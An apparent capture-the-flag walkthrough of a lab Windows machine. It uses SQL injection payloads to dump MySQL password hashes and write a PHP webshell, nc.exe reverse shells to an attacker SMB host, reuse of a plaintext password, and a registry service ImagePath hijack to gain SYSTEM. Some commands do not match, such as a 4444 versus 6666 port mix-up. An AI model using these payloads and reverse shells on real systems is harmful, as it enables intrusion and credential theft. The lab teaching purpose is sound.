Control
Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.167 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.93 scan initiated Mon Mar 27 11:11:02 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.167
Nmap scan report for 10.10.10.167
Host is up (0.059s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
3306/tcp open mysql
49666/tcp open unknown
49667/tcp open unknown
# Nmap done at Mon Mar 27 11:11:28 2023 -- 1 IP address (1 host up) scanned in 26.63 secondsNow that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p80,135,3306,49666,49667 10.10.10.167 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.93 scan initiated Mon Mar 27 11:12:08 2023 as: nmap -sCV -p80,135,3306,49666,49667 -Pn -oN targeted 10.10.10.167
Nmap scan report for 10.10.10.167
Host is up (0.099s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Fidelity
135/tcp open msrpc Microsoft Windows RPC
3306/tcp open mysql?
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar 27 11:13:08 2023 -- 1 IP address (1 host up) scanned in 60.63 secondsThe website shows a landing page with four buttons.
There is a comment in the source code of the main page with an IP address.
The Admin button will redirect to admin.php, which is asking for a missing header.
Exploitation
We could try to bruteforce the header. Let's use wfuzz and set each available header in the wordlist to the IP address we found in the source code.
wfuzz -c --hh=89 -t 200 -w /usr/share/seclists/Miscellaneous/web/http-request-headers/http-request-headers-fields-large.txt -H "FUZZ: 192.168.4.28" http://10.10.10.167/admin.php
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.167/admin.php
Total requests: 1185
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000145: 400 6 L 34 W 374 Ch "Content-Length"
000000732: 501 6 L 26 W 343 Ch "Transfer-Encoding"
000000923: 200 153 L 466 W 7933 Ch "X-Forwarded-For"
Total time: 0
Processed Requests: 1185
Filtered Requests: 1182
Requests/sec.: 0The X-Forwarded-For header returns a 200 status code. Let's use BurpSuite as a proxy, and inject this header into every request we make from our browser. Configure it from Proxy > Proxy settings > Match and replace rules.
Now we have access to the admin page.
If we try to find a product with a ' character, an SQL error will appear. Which means that probably the site is vulnerable to SQL Injections.
First, we need to know the number of columns of the current table. As we can see, it has 6 columns, because it doesn't show any errors.
p' order by 6-- -
Now, we could try to list the available databases.
p' union select schema_name,2,3,4,5,6 from information_schema.schemata-- -
There is one database mysql, which usually has two columns called user and password. Let's retrieve the data of those columns.
p' union select user,password,3,4,5,6 from mysql.user-- -
We get password hashes for users root, manager and hector. We can try to break those with rainbow tables.
These credentials might be useful in the future. Let's try to get a shell in the system. Something we could do is check as what user we are running queries in the database.
p' union select user(),2,3,4,5,6-- -
It is the manager user. Which happens to have the FILE privilege, so we can create files in the system.
p' union select grantee,privilege_type,is_grantable,4,5,6 from information_schema.user_privileges-- -
As the web server is using IIS 10.0, the website should be located in C:\intepub\wwwroot\. Create a PHP webshell in that directory.
p' union select "<?php system($_GET[\'cmd\']);?>",2,3,4,5,6 into outfile "c:\inetpub\wwwroot\rce.php"-- -
Now, set a netcat listener on port 4444.
nc -lvnp 4444
-llisten mode.-vverbose mode.-pspecify the port to listen on.-nnumeric-only IP, no DNS resolution.
And a SMB server where the nc.exe binary is located.
impacket-smbserver smbFolder $(pwd) -smb2support
Finally, send a reverse shell to our netcat listener, and get a shell as nt authority\iusr.
curl "http://10.10.10.167/rce.php?cmd=\\10.10.14.11\smbFolder\nc.exe+-e+cmd+10.10.14.11+4444"
Listening on 0.0.0.0 4444
Connection received on 10.10.10.167 49698
Microsoft Windows [Version 10.0.17763.805]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\inetpub\wwwroot>whoami
whoami
nt authority\iusrPrivilege Escalation
As seen, there is a local user called Hector.
net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
Hector WDAGUtilityAccount
The command completed with one or more errors.Which is a member of the Remote Management Users group. We could try to run commands as this user creating PSCredentials and using Invoke-Command with the credentials that got earlier.
powershell
hostname
$user = "Fidelity\chris"
$password = ConvertTo-SecureString 'l33th4x0rhector' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential($user, $password)
Invoke-Command -Credential $cred -ComputerName localhost -ScriptBlock { whoami }
control\hectorAs we can run commands as hector, let's get a reverse shell as him. First, set another netcat listener on port 5555.
rlwrap nc -lvnp 5555
-llisten mode.-vverbose mode.-nnumeric-only IP, no DNS resolution.-pspecify the port to listen on.
Then send the reverse shell using Invoke-Command. Then, we'll be able to grab the user flag.
Invoke-Command -Credential $cred -ComputerName localhost -ScriptBlock { \10.10.14.11\smbFolder\nc.exe -e cmd 10.10.14.11 5555 }
Listening on 0.0.0.0 5555
Connection received on 10.10.10.167 49706
Microsoft Windows [Version 10.0.17763.805]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\Hector\Documents>whoami
whoami
control\hector
C:\Users\Hector\Documents>type \users\hector\desktop\user.txt
type \users\hector\desktop\user.txt
9943350f7b824c5464aad64a2e5400f6If the PowerShell history file there are a few interesting commands.
type \Users\Hector\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
get-childitem HKLM:\SYSTEM\CurrentControlset | format-list
get-acl HKLM:\SYSTEM\CurrentControlSet | format-listLet's use a PowerShell shell, and inspect these commands. The first one, list keys under CurrentControlSet which Services is one of them.
powershell
get-childitem HKLM:\SYSTEM\CurrentControlset | format-list
...
Property : {}
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Services
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName : Services
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount : 667
View : Default
Handle : Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount : 0
Name : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Services
...The second one lists ACLs of CurrentControlSet.
get-acl HKLM:\SYSTEM\CurrentControlSet | format-list
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet
Owner : BUILTIN\Administrators
Group : NT AUTHORITY\SYSTEM
Access : BUILTIN\Administrators Allow FullControl
NT AUTHORITY\Authenticated Users Allow ReadKey
NT AUTHORITY\Authenticated Users Allow -2147483648
S-1-5-32-549 Allow ReadKey
S-1-5-32-549 Allow -2147483648
BUILTIN\Administrators Allow FullControl
BUILTIN\Administrators Allow 268435456
NT AUTHORITY\SYSTEM Allow FullControl
NT AUTHORITY\SYSTEM Allow 268435456
CREATOR OWNER Allow 268435456
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadKey
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow -2147483648
S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681 Allow
ReadKey
S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681 Allow
-2147483648
Audit :
Sddl : O:BAG:SYD:AI(A;;KA;;;BA)(A;ID;KR;;;AU)(A;CIIOID;GR;;;AU)(A;ID;KR;;;SO)(A;CIIOID;GR;;;SO)(A;ID;KA;;;BA)(A;CIIOI
D;GA;;;BA)(A;ID;KA;;;SY)(A;CIIOID;GA;;;SY)(A;CIIOID;GA;;;CO)(A;ID;KR;;;AC)(A;CIIOID;GR;;;AC)(A;ID;KR;;;S-1-15-
3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681)(A;CIIOID;GR;;;S
-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681)As this output looks a bit messy, we can view it i a more human-readable way.
$acl = get-acl HKLM:\SYSTEM\CurrentControlSet\Services
ConvertFrom-SddlString -Sddl $acl.Sddl | Foreach-Object {$_.DiscretionaryAcl}
NT AUTHORITY\Authenticated Users: AccessAllowed (ExecuteKey, ListDirectory, ReadExtendedAttributes, ReadPermissions, WriteExtendedAttributes)
NT AUTHORITY\SYSTEM: AccessAllowed (ChangePermissions, CreateDirectories, Delete, ExecuteKey, FullControl, GenericExecute, GenericWrite, ListDirectory, ReadExtendedAttributes, ReadPermissions, TakeOwnership, Traverse, WriteData, WriteExtendedAttributes, WriteKey)
BUILTIN\Administrators: AccessAllowed (ChangePermissions, CreateDirectories, Delete, ExecuteKey, FullControl, GenericExecute, GenericWrite, ListDirectory, ReadExtendedAttributes, ReadPermissions, TakeOwnership, Traverse, WriteData, WriteExtendedAttributes, WriteKey)
CONTROL\Hector: AccessAllowed (ChangePermissions, CreateDirectories, Delete, ExecuteKey, FullControl, GenericExecute, GenericWrite, ListDirectory, ReadExtendedAttributes, ReadPermissions, TakeOwnership, Traverse, WriteData, WriteExtendedAttributes, WriteKey)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES: AccessAllowed (ExecuteKey, ListDirectory, ReadExtendedAttributes, ReadPermissions, WriteExtendedAttributes)As seen above, hector hash full access over the services. To verify it, let's run WinPEAS.exe. Copy it where the SMB server is located, and run it from the victim machine.
\\10.10.14.11\smbFolder\winPEASany.exe
...
���������� Looking if you can modify any service registry
...
HKLM\system\currentcontrolset\services\seclogon (Hector [FullControl])
...There are a few services that we can modify. But there is one called seclogon, which when executed, runs with administrator privileges.
powershell (gp -path hklm:\system\currentcontrolset\services\seclogon).ObjectName
LocalSystemWe need to change the ImagePath of the service.
reg query HKLM\System\CurrentControlSet\Services\seclogon
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\seclogon
Description REG_SZ @%SystemRoot%\system32\seclogon.dll,-7000
DisplayName REG_SZ @%SystemRoot%\system32\seclogon.dll,-7001
ErrorControl REG_DWORD 0x1
FailureActions REG_BINARY 805101000000000000000000030000001400000001000000C0D4010001000000E09304000000000000000000
ImagePath REG_EXPAND_SZ %windir%\system32\svchost.exe -k netsvcs -p
ObjectName REG_SZ LocalSystem
RequiredPrivileges REG_MULTI_SZ SeTcbPrivilege\0SeRestorePrivilege\0SeBackupPrivilege\0SeAssignPrimaryTokenPrivilege\0SeIncreaseQuotaPrivilege\0SeImpersonatePrivilege
Start REG_DWORD 0x3
Type REG_DWORD 0x20
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\seclogon\Parameters
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\seclogon\SecurityChange the ImagePath to our nc.exe binary from out local SMB server, and send a reverse shell to out machine on port 6666.
reg add HKLM\System\CurrentControlSet\Services\seclogon /t REG_EXPAND_SZ /v ImagePath /d "\\10.10.14.11\smbFolder\nc.exe -e cmd 10.10.14.11 4444" /f
Set another netcat listener on port 6666.
nc -lvnp 6666
As we can see, the service is stopped.
sc query seclogon
SERVICE_NAME: seclogon
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 1 STOPPED
WIN32_EXIT_CODE : 1077 (0x435)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0All we have to do is start the service to get a shell as nt authority\system. Then, all we have to do is reap the harvest and take the root flag.
sc start seclogon
Listening on 0.0.0.0 6666
Connection received on 10.10.10.167 49721
Microsoft Windows [Version 10.0.17763.805]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>type \users\administrator\desktop\root.txt
type \users\administrator\desktop\root.txt
c31ba53ef095b0b4f380a162099c6ebaLast updated
Was this helpful?